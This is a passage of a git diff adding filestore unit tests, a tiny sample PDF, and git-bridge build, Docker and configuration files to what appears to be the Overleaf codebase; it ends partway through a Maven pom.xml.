+        expect(PersistorManager.deleteDirectory).to.have.been.calledWith(
+          bucket,
+          projectKey
+        )
+        done()
+      })
+    })
+
+    it('should throw an error when the key is in the wrong format', function (done) {
+      FileHandler.deleteProject(bucket, 'wombat', err => {
+        expect(err).to.exist
+        done()
+      })
+    })
+  })
+
+  describe('getFile', function () {
+    it('should return the source stream if no format or style is defined', function (done) {
+      FileHandler.getFile(bucket, key, null, (err, stream) => {
+        expect(err).not.to.exist
+        expect(stream).to.equal(sourceStream)
+        done()
+      })
+    })
+
+    it('should pass options through to PersistorManager', function (done) {
+      const options = { start: 0, end: 8 }
+      FileHandler.getFile(bucket, key, options, err => {
+        expect(err).not.to.exist
+        expect(PersistorManager.getObjectStream).to.have.been.calledWith(
+          bucket,
+          key,
+          options
+        )
+        done()
+      })
+    })
+
+    describe('when a format is defined', function () {
+      let result
+
+      describe('when the file is not cached', function () {
+        beforeEach(function (done) {
+          FileHandler.getFile(bucket, key, { format: 'png' }, (err, stream) => {
+            result = { err, stream }
+            done()
+          })
+        })
+
+        it('should convert the file', function () {
+          expect(FileConverter.promises.convert).to.have.been.called
+        })
+
+        it('should compress the converted file', function () {
+          expect(ImageOptimiser.promises.compressPng).to.have.been.called
+        })
+
+        it('should return the converted stream', function () {
+          expect(result.err).not.to.exist
+          expect(result.stream).to.equal(readStream)
+          expect(PersistorManager.getObjectStream).to.have.been.calledWith(
+            bucket,
+            key
+          )
+        })
+      })
+
+      describe('when the file is cached', function () {
+        beforeEach(function (done) {
+          PersistorManager.checkIfObjectExists = sinon.stub().resolves(true)
+          FileHandler.getFile(bucket, key, { format: 'png' }, (err, stream) => {
+            result = { err, stream }
+            done()
+          })
+        })
+
+        it('should not convert the file', function () {
+          expect(FileConverter.promises.convert).not.to.have.been.called
+        })
+
+        it('should not compress the converted file again', function () {
+          expect(ImageOptimiser.promises.compressPng).not.to.have.been.called
+        })
+
+        it('should return the cached stream', function () {
+          expect(result.err).not.to.exist
+          expect(result.stream).to.equal(sourceStream)
+          
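+          // the stream must be fetched under the converted key, not the original one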
expect(PersistorManager.getObjectStream).to.have.been.calledWith( + bucket, + convertedKey + ) + }) + }) + }) + + describe('when a style is defined', function () { + it('generates a thumbnail when requested', function (done) { + FileHandler.getFile(bucket, key, { style: 'thumbnail' }, err => { + expect(err).not.to.exist + expect(FileConverter.promises.thumbnail).to.have.been.called + expect(FileConverter.promises.preview).not.to.have.been.called + done() + }) + }) + + it('generates a preview when requested', function (done) { + FileHandler.getFile(bucket, key, { style: 'preview' }, err => { + expect(err).not.to.exist + expect(FileConverter.promises.thumbnail).not.to.have.been.called + expect(FileConverter.promises.preview).to.have.been.called + done() + }) + }) + }) + }) + + describe('getRedirectUrl', function () { + beforeEach(function () { + Settings.filestore = { + allowRedirects: true, + stores: { + userFiles: bucket, + }, + } + }) + + it('should return a redirect url', function (done) { + FileHandler.getRedirectUrl(bucket, key, (err, url) => { + expect(err).not.to.exist + expect(url).to.equal(redirectUrl) + done() + }) + }) + + it('should call the persistor to get a redirect url', function (done) { + FileHandler.getRedirectUrl(bucket, key, () => { + expect(PersistorManager.getRedirectUrl).to.have.been.calledWith( + bucket, + key + ) + done() + }) + }) + + it('should return null if options are supplied', function (done) { + FileHandler.getRedirectUrl( + bucket, + key, + { start: 100, end: 200 }, + (err, url) => { + expect(err).not.to.exist + expect(url).to.be.null + done() + } + ) + }) + + it('should return null if the bucket is not one of the defined ones', function (done) { + FileHandler.getRedirectUrl('a_different_bucket', key, (err, url) => { + expect(err).not.to.exist + expect(url).to.be.null + done() + }) + }) + + it('should return null if redirects are not enabled', function (done) { + Settings.filestore.allowRedirects = false + FileHandler.getRedirectUrl(bucket, key, (err, url) => { + expect(err).not.to.exist + expect(url).to.be.null + done() + }) + }) + }) + + describe('getDirectorySize', function () { + it('should call the filestore manager to get directory size', function (done) { + FileHandler.getDirectorySize(bucket, key, err => { + expect(err).not.to.exist + expect(PersistorManager.directorySize).to.have.been.calledWith( + bucket, + key + ) + done() + }) + }) + }) +}) diff --git a/services/filestore/test/unit/js/ImageOptimiserTests.js b/services/filestore/test/unit/js/ImageOptimiserTests.js new file mode 100644 index 0000000..cec7da6 --- /dev/null +++ b/services/filestore/test/unit/js/ImageOptimiserTests.js @@ -0,0 +1,67 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const modulePath = '../../../app/js/ImageOptimiser.js' +const { FailedCommandError } = require('../../../app/js/Errors') +const SandboxedModule = require('sandboxed-module') + +describe('ImageOptimiser', function () { + let ImageOptimiser, SafeExec + const sourcePath = '/wombat/potato.eps' + + beforeEach(function () { + SafeExec = { + promises: sinon.stub().resolves(), + } + ImageOptimiser = SandboxedModule.require(modulePath, { + requires: { + './SafeExec': SafeExec, + '@overleaf/metrics': { + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + }, + }) + }) + + describe('compressPng', function () { + it('should convert the file', function (done) { + ImageOptimiser.compressPng(sourcePath, err => { + expect(err).not.to.exist + 
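+        // optipng should be invoked via SafeExec with only the source path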
expect(SafeExec.promises).to.have.been.calledWith([ + 'optipng', + sourcePath, + ]) + done() + }) + }) + + it('should return the error', function (done) { + SafeExec.promises.rejects('wombat herding failure') + ImageOptimiser.compressPng(sourcePath, err => { + expect(err.toString()).to.equal('wombat herding failure') + done() + }) + }) + }) + + describe('when optimiser is sigkilled', function () { + const expectedError = new FailedCommandError('', 'SIGKILL', '', '') + let error + + beforeEach(function (done) { + SafeExec.promises.rejects(expectedError) + ImageOptimiser.compressPng(sourcePath, err => { + error = err + done() + }) + }) + + it('should not produce an error', function () { + expect(error).not.to.exist + }) + + it('should log a warning', function () { + expect(this.logger.warn).to.have.been.calledOnce + }) + }) +}) diff --git a/services/filestore/test/unit/js/KeybuilderTests.js b/services/filestore/test/unit/js/KeybuilderTests.js new file mode 100644 index 0000000..96f4d67 --- /dev/null +++ b/services/filestore/test/unit/js/KeybuilderTests.js @@ -0,0 +1,37 @@ +const SandboxedModule = require('sandboxed-module') + +const modulePath = '../../../app/js/KeyBuilder.js' + +describe('KeybuilderTests', function () { + let KeyBuilder + const key = 'wombat/potato' + + beforeEach(function () { + KeyBuilder = SandboxedModule.require(modulePath, { + requires: { '@overleaf/settings': {} }, + }) + }) + + describe('cachedKey', function () { + it('should add the format to the key', function () { + const opts = { format: 'png' } + const newKey = KeyBuilder.addCachingToKey(key, opts) + newKey.should.equal(`${key}-converted-cache/format-png`) + }) + + it('should add the style to the key', function () { + const opts = { style: 'thumbnail' } + const newKey = KeyBuilder.addCachingToKey(key, opts) + newKey.should.equal(`${key}-converted-cache/style-thumbnail`) + }) + + it('should add format first, then style', function () { + const opts = { + style: 'thumbnail', + format: 'png', + } + const newKey = KeyBuilder.addCachingToKey(key, opts) + newKey.should.equal(`${key}-converted-cache/format-png-style-thumbnail`) + }) + }) +}) diff --git a/services/filestore/test/unit/js/LocalFileWriterTests.js b/services/filestore/test/unit/js/LocalFileWriterTests.js new file mode 100644 index 0000000..d5fdb92 --- /dev/null +++ b/services/filestore/test/unit/js/LocalFileWriterTests.js @@ -0,0 +1,111 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const modulePath = '../../../app/js/LocalFileWriter.js' +const SandboxedModule = require('sandboxed-module') +const { Errors } = require('@overleaf/object-persistor') +chai.use(require('sinon-chai')) + +describe('LocalFileWriter', function () { + const writeStream = 'writeStream' + const readStream = 'readStream' + const settings = { path: { uploadFolder: '/uploads' } } + const fsPath = '/uploads/wombat' + const filename = 'wombat' + let stream, fs, LocalFileWriter + + beforeEach(function () { + fs = { + createWriteStream: sinon.stub().returns(writeStream), + unlink: sinon.stub().yields(), + } + stream = { + pipeline: sinon.stub().yields(), + } + + const ObjectPersistor = { Errors } + + LocalFileWriter = SandboxedModule.require(modulePath, { + requires: { + fs, + stream, + '@overleaf/settings': settings, + '@overleaf/metrics': { + inc: sinon.stub(), + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + '@overleaf/object-persistor': ObjectPersistor, + }, + }) + }) + + describe('writeStream', function () { + it('writes the stream 
to the upload folder', function (done) {
+      LocalFileWriter.writeStream(readStream, filename, (err, path) => {
+        expect(err).not.to.exist
+        expect(fs.createWriteStream).to.have.been.calledWith(fsPath)
+        expect(stream.pipeline).to.have.been.calledWith(readStream, writeStream)
+        expect(path).to.equal(fsPath)
+        done()
+      })
+    })
+
+    describe('when there is an error', function () {
+      const error = new Error('not enough ketchup')
+      beforeEach(function () {
+        stream.pipeline.yields(error)
+      })
+
+      it('should wrap the error', function () {
+        LocalFileWriter.writeStream(readStream, filename, err => {
+          expect(err).to.exist
+          expect(err.cause).to.equal(error)
+        })
+      })
+
+      it('should delete the temporary file', function () {
+        LocalFileWriter.writeStream(readStream, filename, () => {
+          expect(fs.unlink).to.have.been.calledWith(fsPath)
+        })
+      })
+    })
+  })
+
+  describe('deleteFile', function () {
+    it('should unlink the file', function (done) {
+      LocalFileWriter.deleteFile(fsPath, err => {
+        expect(err).not.to.exist
+        expect(fs.unlink).to.have.been.calledWith(fsPath)
+        done()
+      })
+    })
+
+    it('should not call unlink with an empty path', function (done) {
+      LocalFileWriter.deleteFile('', err => {
+        expect(err).not.to.exist
+        expect(fs.unlink).not.to.have.been.called
+        done()
+      })
+    })
+
+    it('should not throw an error if the file does not exist', function (done) {
+      const error = new Error('file not found')
+      error.code = 'ENOENT'
+      fs.unlink = sinon.stub().yields(error)
+      LocalFileWriter.deleteFile(fsPath, err => {
+        expect(err).not.to.exist
+        done()
+      })
+    })
+
+    it('should wrap the error', function (done) {
+      const error = new Error('failed to reticulate splines')
+      fs.unlink = sinon.stub().yields(error)
+      LocalFileWriter.deleteFile(fsPath, err => {
+        expect(err).to.exist
+        expect(err.cause).to.equal(error)
+        done()
+      })
+    })
+  })
+})
diff --git a/services/filestore/test/unit/js/SafeExecTests.js b/services/filestore/test/unit/js/SafeExecTests.js
new file mode 100644
index 0000000..169c9fb
--- /dev/null
+++ b/services/filestore/test/unit/js/SafeExecTests.js
@@ -0,0 +1,110 @@
+const chai = require('chai')
+const should = chai.should()
+const { expect } = chai
+const modulePath = '../../../app/js/SafeExec'
+const { Errors } = require('@overleaf/object-persistor')
+const SandboxedModule = require('sandboxed-module')
+
+describe('SafeExec', function () {
+  let settings, options, safeExec
+
+  beforeEach(function () {
+    settings = { enableConversions: true }
+    options = { timeout: 10 * 1000, killSignal: 'SIGTERM' }
+
+    const ObjectPersistor = { Errors }
+
+    safeExec = SandboxedModule.require(modulePath, {
+      globals: { process },
+      requires: {
+        '@overleaf/settings': settings,
+        '@overleaf/object-persistor': ObjectPersistor,
+      },
+    })
+  })
+
+  describe('safeExec', function () {
+    it('should execute a valid command', function (done) {
+      safeExec(['/bin/echo', 'hello'], options, (err, stdout, stderr) => {
+        stdout.should.equal('hello\n')
+        stderr.should.equal('')
+        should.not.exist(err)
+        done()
+      })
+    })
+
+    it('should error when conversions are disabled', function (done) {
+      settings.enableConversions = false
+      safeExec(['/bin/echo', 'hello'], options, err => {
+        expect(err).to.exist
+        done()
+      })
+    })
+
+    it('should execute a command with non-zero exit status', function (done) {
+      safeExec(['/usr/bin/env', 'false'], options, err => {
+        expect(err).to.exist
+        expect(err.name).to.equal('FailedCommandError')
+        expect(err.code).to.equal(1)
+        expect(err.stdout).to.equal('')
+        expect(err.stderr).to.equal('')
+        
done() + }) + }) + + it('should handle an invalid command', function (done) { + safeExec(['/bin/foobar'], options, err => { + err.code.should.equal('ENOENT') + done() + }) + }) + + it('should handle a command that runs too long', function (done) { + safeExec( + ['/bin/sleep', '10'], + { timeout: 500, killSignal: 'SIGTERM' }, + err => { + expect(err).to.exist + expect(err.name).to.equal('FailedCommandError') + expect(err.code).to.equal('SIGTERM') + done() + } + ) + }) + }) + + describe('as a promise', function () { + beforeEach(function () { + safeExec = safeExec.promises + }) + + it('should execute a valid command', async function () { + const { stdout, stderr } = await safeExec(['/bin/echo', 'hello'], options) + + stdout.should.equal('hello\n') + stderr.should.equal('') + }) + + it('should throw a ConversionsDisabledError when appropriate', async function () { + settings.enableConversions = false + try { + await safeExec(['/bin/echo', 'hello'], options) + } catch (err) { + expect(err.name).to.equal('ConversionsDisabledError') + return + } + expect('method did not throw an error').not.to.exist + }) + + it('should throw a FailedCommandError when appropriate', async function () { + try { + await safeExec(['/usr/bin/env', 'false'], options) + } catch (err) { + expect(err.name).to.equal('FailedCommandError') + expect(err.code).to.equal(1) + return + } + expect('method did not throw an error').not.to.exist + }) + }) +}) diff --git a/services/filestore/test/unit/js/SettingsTests.js b/services/filestore/test/unit/js/SettingsTests.js new file mode 100644 index 0000000..a7092cb --- /dev/null +++ b/services/filestore/test/unit/js/SettingsTests.js @@ -0,0 +1,21 @@ +const chai = require('chai') +const { expect } = chai +const SandboxedModule = require('sandboxed-module') + +describe('Settings', function () { + describe('s3', function () { + it('should use JSONified env var if present', function () { + const s3Settings = { + bucket1: { + auth_key: 'bucket1_key', + auth_secret: 'bucket1_secret', + }, + } + process.env.S3_BUCKET_CREDENTIALS = JSON.stringify(s3Settings) + const settings = SandboxedModule.require('@overleaf/settings', { + globals: { console, process }, + }) + expect(settings.filestore.s3.bucketCreds).to.deep.equal(s3Settings) + }) + }) +}) diff --git a/services/filestore/tiny.pdf b/services/filestore/tiny.pdf new file mode 100644 index 0000000..1c64181 --- /dev/null +++ b/services/filestore/tiny.pdf @@ -0,0 +1,58 @@ +%PDF-1.1 +%¥±ë + +1 0 obj + << /Type /Catalog + /Pages 2 0 R + >> +endobj + +2 0 obj + << /Type /Pages + /Kids [3 0 R] + /Count 1 + /MediaBox [0 0 300 144] + >> +endobj + +3 0 obj + << /Type /Page + /Parent 2 0 R + /Resources + << /Font + << /F1 + << /Type /Font + /Subtype /Type1 + /BaseFont /Times-Roman + >> + >> + >> + /Contents 4 0 R + >> +endobj + +4 0 obj + << /Length 55 >> +stream + BT + /F1 18 Tf + 0 0 Td + (Hello World) Tj + ET +endstream +endobj + +xref +0 5 +0000000000 65535 f +0000000018 00000 n +0000000077 00000 n +0000000178 00000 n +0000000457 00000 n +trailer + << /Root 1 0 R + /Size 5 + >> +startxref +565 +%%EOF diff --git a/services/filestore/tsconfig.json b/services/filestore/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/filestore/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/git-bridge/.gitignore b/services/git-bridge/.gitignore new 
file mode 100644 index 0000000..74a7f43 --- /dev/null +++ b/services/git-bridge/.gitignore @@ -0,0 +1,53 @@ +# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and Webstorm +# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 + +# Let's not share anything because we're using Maven. + +.idea +*.iml + +# User-specific stuff: +.idea/workspace.xml +.idea/tasks.xml +.idea/dictionaries +.idea/vcs.xml +.idea/jsLibraryMappings.xml + +# Sensitive or high-churn files: +.idea/dataSources.ids +.idea/dataSources.xml +.idea/dataSources.local.xml +.idea/sqlDataSources.xml +.idea/dynamic.xml +.idea/uiDesigner.xml + +# Gradle: +.idea/gradle.xml +.idea/libraries + +# Mongo Explorer plugin: +.idea/mongoSettings.xml + +## File-based project format: +*.iws + +## Plugin-specific files: + +# IntelliJ +/out/ +target/ + +# mpeltonen/sbt-idea plugin +.idea_modules/ + +# JIRA plugin +atlassian-ide-plugin.xml + +# Crashlytics plugin (for Android Studio and IntelliJ) +com_crashlytics_export_strings.xml +crashlytics.properties +crashlytics-build.properties +fabric.properties + +# Local configuration files +conf/runtime.json diff --git a/services/git-bridge/Dockerfile b/services/git-bridge/Dockerfile new file mode 100644 index 0000000..58572ae --- /dev/null +++ b/services/git-bridge/Dockerfile @@ -0,0 +1,48 @@ +# Dockerfile for git-bridge + +FROM maven:3-amazoncorretto-21-debian AS base + +RUN apt-get update && apt-get install -y make git sqlite3 \ + && rm -rf /var/lib/apt/lists + +COPY vendor/envsubst /opt/envsubst +RUN chmod +x /opt/envsubst + +RUN useradd --create-home node + +FROM base AS builder + +COPY . /app + +WORKDIR /app + +RUN make package \ +# The name of the created jar contains the current version tag. +# Rename it to a static path that can be used for copying. +&& find /app/target \ + -name 'writelatex-git-bridge*jar-with-dependencies.jar' \ + -exec mv {} /git-bridge.jar \; + +FROM amazoncorretto:21-alpine + +RUN apk add --update --no-cache bash git sqlite procps htop net-tools jemalloc util-linux + +ENV LD_PRELOAD=/usr/lib/libjemalloc.so.2 + +RUN adduser -D node + +COPY --from=builder /git-bridge.jar / + +COPY vendor/envsubst /opt/envsubst +RUN chmod +x /opt/envsubst + +COPY conf/envsubst_template.json envsubst_template.json +COPY start.sh start.sh +COPY server-pro-start.sh server-pro-start.sh + +RUN mkdir conf +RUN chown node:node conf + +USER node + +CMD ["/start.sh"] diff --git a/services/git-bridge/LICENSE b/services/git-bridge/LICENSE new file mode 100644 index 0000000..dc6bb13 --- /dev/null +++ b/services/git-bridge/LICENSE @@ -0,0 +1,22 @@ +The MIT License (MIT) + +Copyright (c) 2014 Winston Li + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+
diff --git a/services/git-bridge/Makefile b/services/git-bridge/Makefile
new file mode 100644
index 0000000..2fd30f0
--- /dev/null
+++ b/services/git-bridge/Makefile
@@ -0,0 +1,40 @@
+# git-bridge makefile
+
+MVN_OPTS := --no-transfer-progress
+MVN_TARGET := target/writelatex-git-bridge-1.0-SNAPSHOT-jar-with-dependencies.jar
+
+runtime-conf:
+	/opt/envsubst < conf/envsubst_template.json > conf/runtime.json
+
+
+run: $(MVN_TARGET) runtime-conf
+	java $(GIT_BRIDGE_JVM_ARGS) -jar $(MVN_TARGET) conf/runtime.json
+
+
+$(MVN_TARGET): $(shell find src -type f) pom.xml
+	mvn $(MVN_OPTS) package -DskipTests
+
+build: $(MVN_TARGET)
+
+
+format:
+	mvn $(MVN_OPTS) com.spotify.fmt:fmt-maven-plugin:check
+
+
+format_fix:
+	mvn $(MVN_OPTS) com.spotify.fmt:fmt-maven-plugin:format
+
+
+test:
+	mvn $(MVN_OPTS) test
+
+
+clean:
+	mvn $(MVN_OPTS) clean
+
+
+package: clean
+	mvn $(MVN_OPTS) package -DskipTests
+
+
+.PHONY: run package build clean test runtime-conf
diff --git a/services/git-bridge/README.md b/services/git-bridge/README.md
new file mode 100644
index 0000000..eadc2ab
--- /dev/null
+++ b/services/git-bridge/README.md
@@ -0,0 +1,136 @@
+# writelatex-git-bridge
+
+## Docker
+
+The `Dockerfile` contains all the requirements for building and running the
+ writelatex-git-bridge.
+
+```bash
+# build the image
+docker build -t writelatex-git-bridge .
+
+# run it with the demo config
+docker run -v `pwd`/conf/local.json:/conf/runtime.json writelatex-git-bridge
+```
+
+## Native install
+
+### Required packages
+
+ * `maven` (for building, running tests and packaging)
+ * `jdk-8` (for compiling and running)
+
+### Commands
+
+To be run from the base directory:
+
+**Build jar**:
+`mvn package`
+
+**Run tests**:
+`mvn test`
+
+**Clean**:
+`mvn clean`
+
+To be run from the dev-environment:
+
+**Build jar**:
+`bin/run git-bridge make package`
+
+**Run tests**:
+`bin/run git-bridge make test`
+
+**Clean**:
+`bin/run git-bridge make clean`
+
+### Installation
+
+Install dependencies:
+
+```
+sudo apt-get update
+sudo apt-get install -y maven
+sudo apt-get install -y openjdk-8-jdk
+sudo update-alternatives --set java /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java
+sudo update-alternatives --set javac /usr/lib/jvm/java-8-openjdk-amd64/bin/javac
+```
+
+Create a config file according to the format below.
+
+Run `mvn package` to build, test, and package it into a jar at `target/writelatex-git-bridge-1.0-SNAPSHOT-jar-with-dependencies.jar`.
+
+Use `java -jar <path_to_jar> <path_to_config_file>` to run the server.
+
+## Runtime Configuration
+
+The configuration file is in `.json` format. 
+
+    {
+        "port" (int): the port number,
+        "bindIp" (string): the IP address to bind to,
+        "idleTimeout" (int): the idle timeout, in milliseconds,
+        "rootGitDirectory" (string): the directory in which to store
+                                     git repos and the db/atts,
+        "allowedCorsOrigins" (string): comma-separated list of origins
+                                       allowed to make CORS requests,
+        "apiBaseUrl" (string): base url for the snapshot api,
+        "username" (string, optional): username for http basic auth,
+        "password" (string, optional): password for http basic auth,
+        "postbackBaseUrl" (string): the postback url,
+        "serviceName" (string): current name of writeLaTeX
+                                in case it ever changes,
+        "oauth2Server" (string): oauth2 server,
+                                 with protocol and
+                                 without trailing slash,
+                                 null or missing if oauth2 shouldn't be used,
+        "userPasswordEnabled" (boolean, optional): allow users to authenticate
+                                 with username and password; defaults to false,
+        "repoStore" (object, optional): { configure the repo store
+            "maxFileNum" (long, optional): maximum number of files per project,
+            "maxFileSize" (long, optional): maximum size of a file, inclusive
+        },
+        "swapStore" (object, optional): { the place to swap projects to.
+                                          if null, type defaults to
+                                          "noop"
+            "type" (string): "s3", "memory", "noop" (not recommended),
+            "awsAccessKey" (string, optional): only for s3,
+            "awsSecret" (string, optional): only for s3,
+            "s3BucketName" (string, optional): only for s3,
+            "awsRegion" (string, optional): only for s3
+        },
+        "swapJob" (object, optional): { configure the project
+                                        swapping job.
+                                        if null, defaults to no-op
+            "minProjects" (int64): lower bound on the number of projects
+                                   kept on disk. The swap job never evicts
+                                   below this, regardless of the watermarks;
+                                   if minProjects prevents an eviction,
+                                   the swap job logs a warning,
+            "lowGiB" (int32): the low watermark for swapping,
+                              i.e. swap until disk usage is below this,
+            "highGiB" (int32): the high watermark for swapping,
+                               i.e. start swapping when
+                               disk usage reaches this,
+            "intervalMillis" (int64): the interval between swap job runs
+                                      (each run checks the watermarks).
+                                      3600000 is 1 hour,
+            "compressionMethod" (string, optional): how to compress swapped
+                                                    projects, e.g. "gzip"
+        },
+        "sqliteHeapLimitBytes" (int, optional): soft heap limit for the
+                                                SQLite store; 0 for no limit
+    }
+
+You have to restart the server for configuration changes to take effect.
+
+
+## Creating an OAuth app
+
+In dev-env, run the following command in mongo to create the OAuth application
+for git-bridge.
+ +``` +db.oauthApplications.insert({ + "clientSecret" : "v1.G5HHTXfxsJMmfFhSar9QhJLg/u4KpGpYOdPGwoKdZXk=", + "grants" : [ + "password" + ], + "id" : "264c723c925c13590880751f861f13084934030c13b4452901e73bdfab226edc", + "name" : "Overleaf Git Bridge", + "redirectUris" : [], + "scopes" : [ + "git_bridge" + ] +}) +``` diff --git a/services/git-bridge/conf/envsubst_template.json b/services/git-bridge/conf/envsubst_template.json new file mode 100644 index 0000000..4ede5ba --- /dev/null +++ b/services/git-bridge/conf/envsubst_template.json @@ -0,0 +1,31 @@ +{ + "port": ${GIT_BRIDGE_PORT:-8000}, + "bindIp": "${GIT_BRIDGE_BIND_IP:-0.0.0.0}", + "idleTimeout": ${GIT_BRIDGE_IDLE_TIMEOUT:-30000}, + "rootGitDirectory": "${GIT_BRIDGE_ROOT_DIR:-/tmp/wlgb}", + "allowedCorsOrigins": "${GIT_BRIDGE_ALLOWED_CORS_ORIGINS:-https://localhost}", + "apiBaseUrl": "${GIT_BRIDGE_API_BASE_URL:-https://localhost/api/v0}", + "postbackBaseUrl": "${GIT_BRIDGE_POSTBACK_BASE_URL:-https://localhost}", + "serviceName": "${GIT_BRIDGE_SERVICE_NAME:-Overleaf}", + "oauth2Server": "${GIT_BRIDGE_OAUTH2_SERVER:-https://localhost}", + "userPasswordEnabled": ${GIT_BRIDGE_USER_PASSWORD_ENABLED:-false}, + "repoStore": { + "maxFileNum": ${GIT_BRIDGE_REPOSTORE_MAX_FILE_NUM:-2000}, + "maxFileSize": ${GIT_BRIDGE_REPOSTORE_MAX_FILE_SIZE:-52428800} + }, + "swapStore": { + "type": "${GIT_BRIDGE_SWAPSTORE_TYPE:-noop}", + "awsAccessKey": "${GIT_BRIDGE_SWAPSTORE_AWS_ACCESS_KEY}", + "awsSecret": "${GIT_BRIDGE_SWAPSTORE_AWS_SECRET}", + "s3BucketName": "${GIT_BRIDGE_SWAPSTORE_S3_BUCKET_NAME}", + "awsRegion": "${GIT_BRIDGE_SWAPSTORE_AWS_REGION:-us-east-1}" + }, + "swapJob": { + "minProjects": ${GIT_BRIDGE_SWAPJOB_MIN_PROJECTS:-50}, + "lowGiB": ${GIT_BRIDGE_SWAPJOB_LOW_GIB:-128}, + "highGiB": ${GIT_BRIDGE_SWAPJOB_HIGH_GIB:-256}, + "intervalMillis": ${GIT_BRIDGE_SWAPJOB_INTERVAL_MILLIS:-3600000}, + "compressionMethod": "${GIT_BRIDGE_SWAPJOB_COMPRESSION_METHOD:-gzip}" + }, + "sqliteHeapLimitBytes": ${GIT_BRIDGE_SQLITE_HEAP_LIMIT_BYTES:-0} +} diff --git a/services/git-bridge/conf/example_config.json b/services/git-bridge/conf/example_config.json new file mode 100644 index 0000000..76b82eb --- /dev/null +++ b/services/git-bridge/conf/example_config.json @@ -0,0 +1,30 @@ +{ + "port": 8080, + "bindIp": "127.0.0.1", + "idleTimeout": 30000, + "rootGitDirectory": "/tmp/wlgb", + "allowedCorsOrigins": "https://localhost", + "apiBaseUrl": "https://localhost/api/v0", + "postbackBaseUrl": "https://localhost", + "serviceName": "Overleaf", + "oauth2Server": "https://localhost", + "repoStore": { + "maxFileNum": 2000, + "maxFileSize": 52428800 + }, + "swapStore": { + "type": "s3", + "awsAccessKey": "asdf", + "awsSecret": "asdf", + "s3BucketName": "com.overleaf.testbucket", + "awsRegion": "us-east-1" + }, + "swapJob": { + "minProjects": 50, + "lowGiB": 128, + "highGiB": 256, + "intervalMillis": 3600000, + "compressionMethod": "gzip" + }, + "sqliteHeapLimitBytes": 512000000 +} diff --git a/services/git-bridge/conf/local.json b/services/git-bridge/conf/local.json new file mode 100644 index 0000000..c4de48d --- /dev/null +++ b/services/git-bridge/conf/local.json @@ -0,0 +1,25 @@ +{ + "port": 8000, + "bindIp": "0.0.0.0", + "idleTimeout": 30000, + "rootGitDirectory": "/tmp/wlgb", + "allowedCorsOrigins": "http://v2.overleaf.test", + "apiBaseUrl": "http://v2.overleaf.test:3000/api/v0", + "postbackBaseUrl": "http://git-bridge:8000", + "serviceName": "Overleaf", + "oauth2Server": "http://v2.overleaf.test:3000", + "repoStore": { + "maxFileNum": 2000, + "maxFileSize": 52428800 + 
}, + "swapStore": { + "type": "noop" + }, + "swapJob": { + "minProjects": 50, + "lowGiB": 128, + "highGiB": 256, + "intervalMillis": 3600000, + "compressionMethod": "gzip" + } +} diff --git a/services/git-bridge/pom.xml b/services/git-bridge/pom.xml new file mode 100644 index 0000000..7b2c5b8 --- /dev/null +++ b/services/git-bridge/pom.xml @@ -0,0 +1,275 @@ +<?xml version="1.0" encoding="UTF-8"?> +<project xmlns="http://maven.apache.org/POM/4.0.0" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> + <modelVersion>4.0.0</modelVersion> + + <groupId>uk.ac.ic.wlgitbridge</groupId> + <artifactId>writelatex-git-bridge</artifactId> + <version>1.0-SNAPSHOT</version> + <properties> + <java.version>21</java.version> + <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> + <maven.compiler.plugin.version>3.13.0</maven.compiler.plugin.version> + <maven.surefire.plugin.version>2.12.4</maven.surefire.plugin.version> + <maven.assembly.plugin.version>3.1.0</maven.assembly.plugin.version> + <fmt.plugin.version>2.23</fmt.plugin.version> + <junit.version>4.13.2</junit.version> + <jmock.junit4.version>2.8.4</jmock.junit4.version> + <jetty.servlet.version>9.4.57.v20241219</jetty.servlet.version> + <gson.version>2.9.0</gson.version> + <async.http.client.version>3.0.1</async.http.client.version> + <jgit.version>6.6.1.202309021850-r</jgit.version> + <sqlite.jdbc.version>3.41.2.2</sqlite.jdbc.version> + <joda.time.version>2.9.9</joda.time.version> + <google.oauth.client.version>1.37.0</google.oauth.client.version> + <google.http.client.version>1.23.0</google.http.client.version> + <commons.lang3.version>3.17.0</commons.lang3.version> + <logback.classic.version>1.2.13</logback.classic.version> + <mockserver.version>5.12.0</mockserver.version> + <mockito.version>5.12.0</mockito.version> + <aws.java.sdk.version>1.12.780</aws.java.sdk.version> + <jakarta.xml.bind.api.version>${jaxb.runtime.version}</jakarta.xml.bind.api.version> + <jaxb.runtime.version>2.3.2</jaxb.runtime.version> + <httpclient.version>4.5.14</httpclient.version> + <commons.io.version>2.18.0</commons.io.version> + <commons.compress.version>1.27.1</commons.compress.version> + <simpleclient.version>0.10.0</simpleclient.version> + <bouncycastle.crypto.version>1.70</bouncycastle.crypto.version> + </properties> + <build> + <plugins> + <!-- 